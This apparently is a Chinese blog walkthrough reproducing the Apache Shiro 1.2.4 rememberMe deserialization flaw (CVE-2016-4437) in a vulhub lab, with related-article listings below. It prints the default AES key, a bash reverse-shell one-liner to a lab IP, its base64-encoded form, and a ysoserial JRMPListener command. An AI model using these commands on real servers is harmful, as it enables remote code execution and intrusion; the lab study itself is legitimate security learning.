Apache Shiro反序列化漏洞-Shiro-550复现

最新推荐文章于 2024-09-14 12:49:05 发布
最新推荐文章于 2024-09-14 12:49:05 发布
阅读量839 收藏 28
点赞数 34
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_69206769/article/details/136770563
版权
本文详细介绍了Shiro1.2.4版本中的反序列化漏洞原理,涉及AES加密和硬编码密钥的安全隐患。通过环境搭建和CVE-2016-4437漏洞利用步骤,展示了如何利用该漏洞获取shell权限。
摘要由CSDN通过智能技术生成

1.漏洞原理

        在Shiro <= 1.2.4中,反序列化过程中所用到的AES加密的key是硬编码在源码中,当用户勾选RememberMe并登录成功,Shiro会将用户的cookie值序列化,AES加密,然后base64编码后存储在cookie的rememberMe字段中,服务端收到登录请求后,会对rememberMe的cookie值进行base64解码,然后AES解密,最后反序列化。由于AES加密是对称加密算法,所以如果攻击者知道AES的密钥值,就可以构造恶意的rememberMe cookie值从而触发反序列化漏洞。Shiro 1.2.4版本之前内置了一个默认且固定的加密Key,导致攻击者可以伪造任意的rememberMe cookie值。

2.环境搭建  

        靶机:ubuntu 192.168.101.52

        攻击机: kali 192.168.101.31

        vps: window11 192.168.101.13

1. cd vulhub/shiro/CVE-2016-4437
2. docker-compose up -d

工具包:链接:https://pan.baidu.com/s/1HtN-d2h_WqhaRZwuhrkgow?pwd=amhm
             提取码:amhm
 

只要响应包中出现rememberMe=delete字段就说明存在漏洞,这样说是不正确的,这只能说明登录页面采用了Shiro进行了身份验证。

具体验证可以参考这篇博客,但要也要成功得到密钥才能对漏洞进行利用

详细shiro漏洞复现及利用方法(CVE-2016-4437)_糊涂是福yyyy的博客-CSDN博客

漏洞利用

利用Shiro_exploit.py爆破密钥为kPH+bIxk5D2deZiIxcaaaA==,就可以进行下一步操作了

用nc开启监听

对反弹shell的bash命令进行base64编码

bash -i >& /dev/tcp/192.168.101.31/2233 0>&1

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xMzEvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}

用序列化攻具ysoserial监听5555端口

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 5555 CommonsCollentions5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xMzEvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}"

使用shiro.py生成rememberMe

在burpsuite的Cookie中添加rememberMe字段

点击发送,成功获得shell

集成化工具使用

使用工具也太简单了。。

Floating Star
关注
Apache Shiro 1.2.4反序列化漏洞(Shiro-550)--Shiro rememberMe反序列化漏洞(CVE-2016-4437)
薛定谔嘚喵博客
05-10 1568
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。
经典的Shiro反序列化漏洞复现
hackzkaq的博客
11-27 757
其实这个还是得学习学习加密解密的方法,才能进行编写poc,但是此处只是了解个思路。具体可参考其他文章;没看够~?欢迎关注!
漏洞复现Apache_Shiro_1.2.4_反序列化漏洞(CVE-2016-4437)
过期的秋刀鱼
11-05 891
由于使用了aes加密,想要成功利用漏洞则需要获取ase的加密秘钥,而在shiro的1.2.4之前的版本中使用的硬编码。其中默认秘钥的b ase64编码后的值为kPH+bIxk5D2deZiIxcaaaA==,这里就可以通过构造恶意的序列化对象进行编码,加密,然后欧威cooike加密发送,服务端接受后会解密并触发反序列化漏洞。cookie的key为rememberme,cookie的值是经过对相关的信息进行序列化,然后实用aes加密,最后在使用b ase64编码处理形成的。字段,登陆成功的话,返回包。
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437)
qq_51163834的博客
06-05 2111
Apache Shiro框架提供了记住密码的功能,用户登录成功后会将用户信息加密,加密过程:用户信息=>序列化=>AES加密=>BASE64编码=>RememberMe Cookie值。如果用户勾选记住密码,那么在请求中会携带cookie,并且将加密信息存放在cookie的rememberMe字段里面,在服务器收到请求对RememberMe值,先进行base64解码然后AES解密在反序列化,这个加密过程如果我们知道AES加密的密钥,那么我们把用户信息替换成恶意命令,就导致了反序列化RCE漏洞
漏洞复现Apache Shiro 反序列化漏洞
热门推荐
网络安全知识分享
12-31 1万+
Apache Shiro 反序列化漏洞一、简介二、环境三、漏洞原理四、AES秘钥1、判断AES秘钥五、Shiro rememberMe反序列化漏洞Shiro-550)1、版本1.4.2之前该版本漏洞利用2、版本1.4.2之后该版本漏洞利用六、Shiro Padding Oracle Attack(Shiro-721)1、漏洞利用七、图形化工具 欢迎大家关注我的公众号“嘀嗒安全shiro漏洞已经曝光很久了,一直没有整理思路与详细步骤,最近在学习java的反序列化复现漏洞来方便之后的学习 一、简介
Shiro反序列化漏洞Shiro-550反序列化漏洞复现
人若无名,便可专心练剑
03-14 1376
Shiro-550反序列化漏洞大约在2016年就被披露了,但感觉直到近一两年,在各种攻防演练中这个漏洞才真正走进了大家的视野,Shiro-550反序列化应该可以算是这一两年最好用的RCE漏洞之一,原因有很多:Shiro框架使用广泛,漏洞影响范围广;攻击payload经过AES加密,很多安全防护设备无法识别/拦截攻击……
Apache Shiro-550 反序列化漏洞复现
ZXT02的博客
03-02 1526
Apache Shiro550反序列化(CVE-2016-4437)漏洞分析、复现及修复。
Apache Shiro 反序列化漏洞复现(CVE-20164437)
又菜又爱倒腾的博客
10-29 1751
#Apache Shiro 反序列化漏洞(CVE-20164437)# 一、漏洞简介 Shiro 是 Java 的一个安全框架,执行身份验证、授权、密码、会话管理 shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化 然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。 二、漏洞影响 影响版本 Apache Shiro <=
CVE-2016-4437 Apache Shiro 反序列化漏洞复现
yzl_007的博客
07-26 456
Apache Shiro 反序列化漏洞复现(CVE-2016-4437) 漏洞描述 Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都会导致反序列化漏洞。 使用burp抓包查看 漏洞原理 Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。 Shiro对rememberMe的cookie做了加密处理,shiro
shiro反序列化漏洞详解与复现shiro-550/CVE-2016-4437)
ccccai22的博客
08-28 221
shiro反序列化漏洞shiro-550/CVE-2016-4437)
Shiro反序列化漏洞
m0_71263989的博客
02-20 974
1、简介Apache Shiro框架是一个功能强大且易于使用的 Java 安全框架,它执行身份验证、授权、加密和会话管理。借助 Shiro 易于理解的 API,您可以快速轻松地保护任何应用程序——从最小的移动应用程序到最大的 Web 和企业应用程序。2、原理Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会将用户信息加密,加密过程:用户信息=>序列化=>AES加密=>base64编码=>RememberMe Cookie值。
Shiro反序列化漏洞利用详解(Shiro-550+Shiro-721)
java_lujj的博客
08-29 3567
Shiro 是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能,Shiro框架直观、易用、同时也能提供健壮的安全性。、
CVE-2016-4437 Shiro反序列化漏洞复现
weixin_45260839的博客
05-15 2857
CVE-2016-4437 Shiro反序列化漏洞复现
2024 年浙江省网络安全行业网络安全运维工程师项目 职业技能竞赛网络安全运维工程师(决赛样题)
Aluxian_的博客
09-13 877
作为一名网络安全运维工程师,你发现公司的内部网络出现了异常流量,多个关键应用程序的响应速度显著下降,你需要对网络流量进行深入分析,识别潜在的安全威胁,追踪可疑活动,以确保公司数据的安全性。
网络安全入门教程(非常详细)从零基础入门到精通
2301_77160226的博客
09-11 1362
网络安全是一个非常重要的领地,随着互联网的普及和信息化程度的不断提升,网络安全的重要性也越来越凸显,在日常生活和日常中保护个人信息和隐私,提高安全意识,不随意识泄露敏感信息和密码。对想要从网络安全工作的人来说,需要具备扎实的计算机和错误基础和安全性掌握最新的技术和工具,不断提高防护范围和应对能力。
SSHamble:一款针对SSH技术安全的研究与分析工具
FreeBuf_的博客
09-11 1219
SSHamble是一款功能强大的SSH技术安全分析与研究工具,该工具基于Go语言开发,可以帮助广大研究人员更好地分析SSH相关的安全技术与缺陷问题。
【隐私计算】Cheetah安全多方计算协议-阿里安全双子座实验室
最新发布
木亦汐丫
09-14 1180
2PC-NN安全推理与实际应用之间仍存在较大性能差距,因此只适用于小数据集或简单模型。Cheetah仔细设计DNN,基于格的同态加密、VOLE类型的不经意传输和秘密共享,提出了一个2PC-NN推理系统Cheetah,比CCS'20的CrypTFlow2开销小的多,计算效率更快,通信效率更高。主要贡献有两点:基于格的同态加密的协议可在不进行任何昂贵同态Rotation操作的情况下评估线性层;提出了非线性函数的几个精简且通信高效的原语。
安全政策与安全意识(下)
记录开发和安全学习过程中的点点滴滴
09-13 762
全面深入地探讨了等级保护(等保)体系,包括其三个不同等级的划分、从等保1.0到2.0的发展历程、以及相应的法律和法规基础。文章强调了等保的必要性,并详细介绍了等保测评流程,如何确定信息系统的等级,以及关键信息系统的划分和定级建议。并且提供了网络安全、主机安全和应用数据安全的详细解读,以及相应的等级保护安全技术方案,为三级等保提出了通用的实施方案,旨在帮助组织构建符合国家标准的网络安全防护措施。
Apache Shiro 反序列化漏洞分析与利用(Shiro-550 & Shiro-721)
本文主要关注的是Shiro的两个反序列化漏洞,分别是Shiro-550Shiro-721。 **Shiro-550 反序列化漏洞** 这个漏洞源于Shiro的RememberMe功能。当用户选择“记住我”登录时,系统会生成一个加密并编码的cookie,包含...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值